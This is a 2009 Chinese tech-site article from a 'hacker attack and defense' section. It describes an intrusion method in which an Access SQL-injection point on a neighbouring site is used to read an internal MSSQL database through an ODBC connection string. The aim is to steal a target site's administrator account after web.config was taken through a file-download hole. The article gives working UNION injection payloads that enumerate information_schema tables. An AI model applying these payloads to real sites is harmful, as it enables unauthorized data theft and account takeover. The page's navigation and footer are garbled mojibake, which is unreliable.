登录论坛 | 注册会员 设为首页 | 收藏本站
top
濠电姷顣藉Σ鍛村磻閹捐泛绶ゅΔ锝呭暞閸嬪鏌eΟ娆惧殭鏉╂繈姊虹捄銊ユ珢闁瑰嚖鎷� 缂傚倸鍊烽懗鍫曟惞鎼淬劌鐭楅幖娣妼缁€鍌涚箾閹寸們姘跺几鎼粹偓浜滈柕蹇嬪灩椤忣湡   闂傚倸鍊风粈渚€骞楀⿰鍫濈獥閹肩补鍨惧☉妯滄棃宕担瑙勬珦闁诲骸绠嶉崕鍗炍涘☉銏犵厺闁哄啠鍋撻柕鍥у楠炴ḿ鎹勬潪鐗堝煕濠电姷顣藉Σ鍕箯閿燂拷 濠电姷鏁搁崑鐐哄箰閸愬弬娑㈠垂椤曞懏瀵岄梺鍦劋濮婅崵绮婚弮鍫熺厽闁哄倸鐏濋ˉ蹇旂箾閹惧磭鍩i柡灞剧洴瀵挳濡搁妷褌绮堕梻渚€鈧偛鑻晶楣冩煙閸戙倖瀚� 濠电姷鏁搁崑娑㈡偤閵娧呭暗闁稿瞼鍋涚粈鍐煃閸濆嫬鈧悂宕滈鈧埞鎴︽倷閺夋垹浠搁梺鐟扮毞閺呯姴鐣烽姀銈嗗殐闁冲搫鍟版径鍕⒑鐠恒劌娅愰柟鍑ゆ嫹 闂傚倷绀侀幖顐λ囬柆宥呯?闁圭増婢橀崹鍌涖亜閺嶃劌鐒归柡瀣叄閺屾洝绠涙繝鍐ㄦ珰闂佺ǹ顑嗛幐鎼佸煡婢跺﹦鏆﹂柛銉㈡櫆濞堝吋绻濋悽闈涗粶闁归攱鍨块獮蹇涙晸閿燂拷 婵犵數濮烽弫鎼佸磻閻愬搫绠伴柟闂寸缁犵喖鏌ㄩ悢鍝勑㈤柛銊ュ€圭换娑㈠幢濡搫顫庨梺宕囩帛濮婂湱鎹㈠┑鍥╃瘈闁稿本纰嶅▓顓烆渻閵堝棙绌块柟鍑ゆ嫹 濠电姷鏁搁崑鐐哄垂閸洖绠伴柟闂寸贰閺佸嫰鏌涢锝囪穿鐟滅増甯掗悙濠囨煏婵炑€鍋撻柡瀣墪椤啴濡堕崱妯烘殫闂佺ǹ顑囬崰鎰┍婵犲洦鏅搁柨鐕傛嫹   缂傚倸鍊搁崐鎼佸磹閹间礁鐤い鏍仜閸ㄥ倿姊婚崼鐔衡枍缂傚倹宀搁弻娑㈠箛閸忓摜鎸夐梺绋款儐閹稿骞忛崨鏉戠妞ゎ厽鍨堕ˉ宥夋⒒娴h櫣銆婇柡鍜佷邯楠炲繘鏁撻敓锟�   IT濠电姷鏁告慨鐑藉极閹间礁纾绘繛鎴炲殠娴滅懓顭跨捄铏圭伇濞戞挸绉归弻銊╂偆閸屾稑顏�   婵犵數濮烽弫鎼佸磻閻愬搫绠伴柣鎰靛墰缁犻箖鏌嶈閸撴瑩婀佸┑鐘诧攻閸旀牜鈧熬鎷�   闂傚倸鍊风粈渚€骞夐敓鐘偓鍐幢濞戞瑥浜遍梺鍝勬川閸嬫劙寮ㄩ敃鍌涚厓鐟滄繈骞忛敓锟�   闂傚倷娴囧畷鍨叏瀹曞洨鐭嗗〒姘e亾妤犵偞鐗犻、鏇㈠煑閵娧呯獥闂備浇娉曢崳锕傚箯閿燂拷

濠电姷鏁搁崑鐐哄垂閸洖绠伴柤濮愬€曢崹婵堚偓鍏夊亾闁逞屽墴閸┾偓妞ゆ巻鍋撻柣蹇旂缁绘稒绻濋崒銈呮闂佸壊鍋呭ú鏍矆閸愵喗鐓忓┑鐐茬仢閻忣亪鏌f惔锝嗙>T闂傚倸鍊搁崐鎼佸磹閹间礁纾归柛顐f礀缁€澶屸偓骞垮劚椤︻垶寮伴妷锔剧闁瑰鍋為惃鎴︽煕濡や礁鍝洪柡灞诲姂閹倝宕掑☉姗嗕紦

闂傚倸鍊峰ù鍥ь浖閵娾晜鍊块柨鏃傛櫕閻濆爼鏌涢埄鍐姇闁稿顦甸弻銊╂偆閸屾稑顏�

闂傚倸鍊风粈浣虹礊婵犲倴缂氱憸鏃堛€侀弽顓炲耿婵$偟绮弫鐘绘⒑闁偛绉电€氾拷

缂傚倸鍊搁崐鐑芥倿閿曞倶鈧啴宕卞銏$⊕缁楃喖鍩€椤掑嫨鈧礁鈻庨幘宕囧€炲銈嗗坊閸嬫捇鎮楀顒夋█闁哄被鍔戦幃銈夊磼濞戞﹩浼�

濠电姷鏁搁崑鐐哄垂閸洖绠伴柛鎾楀啫鐏婂銈嗙墬閸戝綊鎮㈤崱娑欑叆闁绘洖鍊圭€氾拷

闂傚倸鍊风粈渚€骞栭銈傚亾濮樼厧寮€规洘娲熷畷姗€鎳犻浣诡啎闂備浇娉曢崳锕傚箯閿燂拷

CPU


闂傚倸鍊风粈渚€骞夐敓鐘茬闁哄洢鍨圭粻鐘诲箹濞n剙濡介柛瀣ㄥ€濋弻銊╂偆閸屾稑顏�


缂傚倸鍊烽懗鍫曟惞鎼淬劌鐭楅幖娣妼缁€鍫熺箾閹寸偐妫ㄦ繛宸簼閺呮悂鏌ㄩ悤鍌涘

闂傚倸鍊风粈渚€骞栭銈傚亾濮樼厧澧柡鍛板煐缁傛帞鈧綆鈧叏闄勯幈銊ノ熼幐搴c€愰梻鍌氬亞閸ㄥ爼寮婚妸鈺傚亞闁稿本绋戦锟�

闂傚倸鍊风粈渚€骞夐垾鎰佹綎濠电姵鑹剧壕缁樼箾閹存瑥鐏╅柣顓燁殜閺岋繝宕堕埡浣圭€荤紓浣稿閸嬨倝寮婚垾鎰佸悑閹肩补鈧枼鎷婚梻浣告憸閸o箓骞忛敓锟�

闂傚倸鍊风粈渚€骞栭锔藉亱闁糕剝鐟ч惌鎾绘倵濞戞鎴﹀矗韫囨稒鐓熼柡鍐ㄥ€哥敮鍫曟⒒閸屻倕鐏﹂柡灞诲姂閹倝宕掑☉姗嗕紦

濠电姵顔栭崰妤€鐣烽崸妤€宸濇い鎾愁檧缂嶄線寮婚敐澶婂唨闁汇垻鏁歌ⅵ闂備礁鎼悮顐﹀礉閹达负鈧礁鈻庨幘鏉戔偓閿嬨亜閹烘垵浜扮紒鎲嬫嫹

闂傚倸鍊风粈渚€骞栭锔藉亱闁归偊鍏橀弸宥夋煥濠靛棭妯堥柡浣革躬閺屾盯顢曢悩鎻掑闂佺ǹ顑冮崝鎴﹀蓟濞戔懇鈧箓骞嬪┑鍛晼闂備胶绮悧顓㈠箯閿燂拷
闂傚倸鍊烽悞锕€顪冮崹顕呯唵闁逞屽墰缁辨帡骞撻幒婵堝悑閻庤娲樼划鎾荤嵁鎼淬劍瀵犲璺虹焾濡插搫鈹戦悩鍨毄濠殿喚鏁搁崰濠傤吋婢跺浠ч梺璺ㄥ櫐閹凤拷 | 缂傚倸鍊搁崐鎼佸磹閹间礁鐤い鏍仜閸ㄥ倿鏌涢敂璇插箹闁搞劍绻堥弻娑㈩敃閿濆棛顦ョ紓浣哄閸o綁寮诲鍫闂佸憡鎸鹃崰搴敋閿濆鍋ㄩ柛娑橈攻濞呫垽姊虹捄銊ユ珢闁瑰嚖鎷� | 闂傚倸鍊烽懗鍫曞箠閹剧粯鍊舵繝闈涚墢閻挾鈧娲栧ú銊х矆婵犲洦鐓涢柛鎰╁妼閳ь剙鎽滈埀顒€鐏氶悡锟犲蓟閵堝棙鍙忛柟閭﹀厴閸嬫挸螖閸涱厽妲梺璺ㄥ櫐閹凤拷 | 缂傚倸鍊搁崐椋庣矆娓氣偓椤㈡牠宕ㄩ幖顓熸櫈闂佸憡渚楅崹鍨叏閾忣偁浜滈柟鎹愭硾閸撻亶鏌涢妶鍡樼闁哄苯绉烽¨渚€鏌涢幘璺烘瀻闁伙絿鍏橀弫鎰緞鐎n偅顏熼梻浣芥硶閸o箓骞忛敓锟� | 闂傚倸鍊峰ù鍥ь浖閵娾晜鍤勯柤绋跨仛濞呯姵淇婇妶鍌氫壕闂佷紮绲介悘姘跺箯閸涱垱鍠嗛柛鏇ㄥ亜婵℃娊姊绘担鑺ョ《闁革綇绠撻獮蹇涙晸閿燂拷 | 闂傚倸鍊风粈渚€骞夐垾鎰佹綎濠电姵鑹剧壕缁樼箾閹存瑥鐏╅柣顓燁殜閺岋繝宕堕妷銉т痪闂佹悶鍊曢敃銉╁Φ閸曨喚鐤€闁圭偓鍓氭禒濂告偠濮樺崬鏋涙慨濠冩そ瀹曘劍绻濋崟顐闂備胶鎳撻崵鏍箯閿燂拷 | 闂傚倸鍊烽悞锕傚箖閸洖纾块柡灞诲劚绾惧潡鏌熼幆鏉啃撻柛銈咁儏闇夐柛蹇撳悑缂嶆垿鏌i幇顒婅含闁哄瞼鍠栭、娑㈠幢濡も偓閺嗘瑥顭块惂鍛婂 | 闂傚倸鍊风粈渚€骞夐敓鐘偓鍐╁緞婵炵偓鐎洪梺鍝勬川閸庢劕銆掓繝姘厱鐎光偓閳ь剟宕戦悙鐑樺€跨紓浣股戦崣蹇斾繆椤栨繍鍤欏褜鍨堕弻娑㈡倻閸ャ劌顏� | IT闂傚倸鍊烽懗鑸电仚濠电偛鐡ㄥ畝绋跨暦閹达箑绀嬫い鎰╁€栧▓楣冩⒑鐠恒劌娅愰柟鍑ゆ嫹 | IT缂傚倸鍊搁崐鐑芥倿閿曞倶鈧啴宕卞☉妯虹€繝闈涘€搁幉锟犲磿婵犲洦鐓ラ柣鏇炲€圭€氾拷 | IT闂傚倸鍊烽懗鑸电仚濡炪倖鍨甸崯鏉戠暦閺囥垺鐒肩€广儱鎳愰悾娲⒑鐠恒劌娅愰柟鍑ゆ嫹 | 濠电姷鏁告慨浼村垂娴犲鐒垫い鎺嶈兌椤ジ鏌涜箛鎾剁劯闁哄矉缍侀獮鎺楁倷閺夋埈浼�
adtop
 
 
当前位置 : 首页>软件学院>网络技术>黑客攻防>正文
 
看黑客通过Access来获取MSSQL数据

http://www.dbit.cn 2009-3-30 7:54:35  来源:东北IT网  编辑:叶子
 
  首先说明一点,这个方法很早就有了,不过用时大概在脑袋里沉寂太久,已经处于忘却状态。感谢Trace提供资料。经常会遇到任意文件下载漏洞,一般处理的方法是把数据库连接文件下载回来,然后远程连接上。

  首先说明一点,这个方法很早就有了,不过用时大概在脑袋里沉寂太久,已经处于忘却状态。感谢Trace提供资料。

  经常会遇到任意文件下载漏洞,一般处理的方法是把数据库连接文件下载回来,然后远程连接上去。最理想的状态莫过于MSSQL和MYSQL,尤其是在数据库和WEB不分离的情况下,备分SHELL,导出SHELL,可以用的方法很多。

  不过要是数据库和WEB分离,而且数据库在内网不可上网,或者有防火墙等等 其他手段使得我们无法连上远程数据库时,不妨假设的再艰难一些,甚至无法找到一个mssql注射点时,很多情况下通常会束手无策。

  这里以 MSSQL为例子,很凑巧找到一个任意文件下载漏洞,直接下了WEB.CONFIG回来看,发现数据库在内网,找了半天没找到注射点,稍微旁注一下,有一个站,可惜是ACCESS数据库。猜不到表和后台。不过目标站的后台是知道的,然后准备从这个access注射点读出目标站管理员帐户。直观一些,下面直 接给出我本地测试结果:

  
黑客


  弄的简单一点,就3个字段,ID,XM,XB,ID数字型,后面2个字符型。

  假设存在漏洞的文件中,执行SQL语句 select * from test whrere id = 1

  这里有3个字段,我们用UNION联合查询给他匹配一下就是(黑盒操作时用order by 或者穷举来确定字段个数)

  SELECT * FROM test where id=999999 union Select top 1 1,2,name from [ODBC;Driver=SQL Server;UID=dbo;PWD=dba;Server=*****;DataBase=master].ku

  这里的master库中我建立了一个名为KU的表,上面这个查询语句中,由于id=999999不存在,在联合查询的作用下,web上原本显示access数据库内容的位置显示出了我们构造的UNION查询结果,name字段处于一个字符型的显示位置。

  
黑客


  ku这个表里的name字段内容就会被显示在web上相应的位置,不过这个显然不是我们想要的,我们要的是整个表的结构和内容

  以master为例子,这里是模拟的结果,事先我已经知道master的结构,待会方便和结果比对校验是否有错。

  
黑客


  SELECT * FROM test where id=999999 union Select top 1 1,2,table_name from [ODBC;Driver=SQL Server;UID=dbo;PWD=dba;Server=*****;DataBase=master].information_schema.tables

  这样master库的第一个表名就出来了。

  
黑客


  获得后面的表名也很简单。

  SELECT * FROM test where id=999999 union Select top 1 1,2,table_name from [ODBC;Driver=SQL Server;UID=dbo;PWD=dba;Server=*****;DataBase=master].information_schema.tables where table_name not in (select top 1 table_name from [ODBC;Driver=SQL Server;UID=dbo;PWD=dba;Server=****;DataBase=master].information_schema.tables)

  
黑客


  以次类以常规方法推取得字段名和字段内容,代码烦琐自行研究下。

  如果数据库里的ID是字符型,则

  SELECT * FROM test where id='999999' union Select top 1 1,2,table_name from [ODBC;Driver=SQL Server;UID=dbo;PWD=dba;Server=***;DataBase=master].information_schema.tables where '1'='1'
 
收藏】【打印】【进入论坛
  相关文章:

67

·黑客必备武器之NC网络军刀
·黑客网站负责人因培训黑客技术入狱
·荷兰释放支持维基解密19岁黑客
·澳洲17岁中学生黑掉Twitter
·WordPress站遭黑客攻击的解决步骤
·黑客利用病毒改高考分 每科4000元
·黑客回应AT&T 所有iPad都存在安全隐患
·普通文件也能成为黑客入侵的手段
·熊猫烧香制造者李俊:黑客是一种荣耀
·全球黑客大赛战况:iPhone 20秒被黑
·黑客技术:ICMP洪水攻击浅析

 
 
 
 
最新文章

中关村艳照门女主角详记录高清组图 
大连护士门大尺度艳照高清组图
iPhone女孩微博爆红 最宝贵东西换iPhon
反恐精英之父内维尔:改变电脑游戏销售
团购网站黎明之前:中国市场惨烈厮杀不
团购鼻祖Groupon中国揭秘:快与慢的商业
Spil Games发布新的品牌形象
1800配置一台主机 不要显示器
联想V360笔记本模特写真
爱国者第四代移动硬盘将面市、低电压保

 
推荐文章
1
2
3
4
5
6
7
8
9
10
iPhone女孩微博爆红 最宝贵东西换
大连护士门大尺度艳照高清组图
中关村艳照门女主角详记录高清组
苹果员工中毒门
宫如敏不雅照疯传 看张馨予韩一菲
深耕市场 永续经营——专访百脑汇
优派专业电子书 让您回家旅途多姿
揭晓百万大奖三星bada魅力绽放中
大明龙权“江湖英雄会”全国PK大
永恒之塔校园达人挑战赛完美落幕
八卦图解 More>>
iPhone女孩微博爆红 最宝贵东西换 大连护士门大尺度艳照高清组图
中关村艳照门女主角详记录高清组 宫如敏不雅照疯传 看张馨予韩一菲

闂傚倷鑳舵灙缂佺粯鍔欏畷銏ゅ冀椤愩儱小濡炪倖甯掔€氼剛鈧艾顦伴妵鍕箳閹存績鍋撻弰蹇嬩汗闁跨噦鎷� - 闂傚倷娴囨竟鍫熴仈缁嬫娼栧┑鐘崇閻掗箖鏌熺紒銏犳灈缂佺媴缍侀弻鐔衡偓娑欋缚閻绱掗鍡樺 - 闂傚倷绀佺紞濠囧绩鏉堚晝鐭欓柟杈剧畱閻鏌i幋鐐ㄧ細闁崇粯娲栭湁闁兼祴鏅炶棢闂佽 鍋撻柨鐕傛嫹 - 濠德板€楁慨鐑藉磻濞戙垺鍊舵繝闈涱儏缁犵喖鏌ㄩ悢鍝勑㈤悗姘槺閳ь剙绠嶉崕閬嶅箠鎼搭煉缍栭柨鐕傛嫹 - 闂傚倷绀侀幉锟犳偡閵夆晩鏁勯柛鈩冪☉绾惧潡鐓崶銊р姇闁绘搫缍侀弻锝夊箛闂堟稑顫╂繝銏n啇閹凤拷
Copyright©2006-2011闂傚倷绶氬ḿ褍螞瀹€鍕;闁跨噦鎷�Dbit.Cn. All Rights Reserved.
闂備礁鎼ˇ顖炴偋韫囨洜鐭堟い銉e及婵犵數濮伴崹濂割敊閹版澘绠柨鐕傛嫹06014875闂傚倷绀侀幉锟犳偡闁秴绠柨鐕傛嫹

Tel:024-88340056 Mob:13066598927 Email:WebMaster QQ:69424720

缂傚倸鍊搁崐鎼佸疮椤栫偛鍨傜憸鐗堝笚閸嬬喖鏌i妶鍐ㄥ缂傚倸鍊搁崐绋棵归崟顖氱闁跨噦鎷�:缂傚倸鍊搁崐椋庣矆娴g儤宕叉慨妞诲亾鐎殿喓鍔戞慨鈧柕鍫濇噽閺屽牓姊虹捄銊ユ珢闁瑰嚖鎷�:65477551 闂傚倷鑳堕幊鎾绘倶閸儱纾婚柟鍓х帛閻撴盯鏌涢顐簻闁诲骏缍侀弻娑滅疀閵夛箑顏�:28526281 婵犵數鍋涢悺銊у垝瀹€鍕珘妞ゆ帊鐒﹀▍鐘崇節婵犲倻澧涢柛瀣ㄥ妼闇夐柨婵嗘噹閺嗘瑥顭块惂鍛婂:24536322 缂傚倸鍊搁崐绋棵洪姀銈呯9婵炴垶鍩冮崑鎾愁潩閾忣偆褰ч柣搴f暩閸樠囷綖濠靛纭€闁绘劖褰冪猾锟�:24815709 缂傚倸鍊烽悞锕€顫忚ぐ鎺撳仭闁冲搫鎳庡Ч鏌ュ级閸碍娅囩紒鈧崘顔界叆闁绘洖鍊圭€氾拷:8052026 婵犵數鍋涢悺銊у垝瀹€鍕珘妞ゆ帊鐒﹀▍鐘崇節婵犲倻澧涢柛瀣ㄥ妼闇夐柨婵嗘噹閺嗘瑥顭块惂鍛婂:57897142 缂傚倸鍊搁崐椋庣矆娴g儤宕叉慨妞诲亾鐎殿喓鍔戞慨鈧柕鍫濇噽閺屽牓姊虹捄銊ユ珢闁瑰嚖鎷�:20966008 濠电姷鏁搁崑鐐哄箰閹间礁绠熼柨鐔哄Т閸ㄥ倹绻涢崱妯虹仼缂佲偓閸愵喗鐓ラ柣鏇炲€圭€氾拷:65477153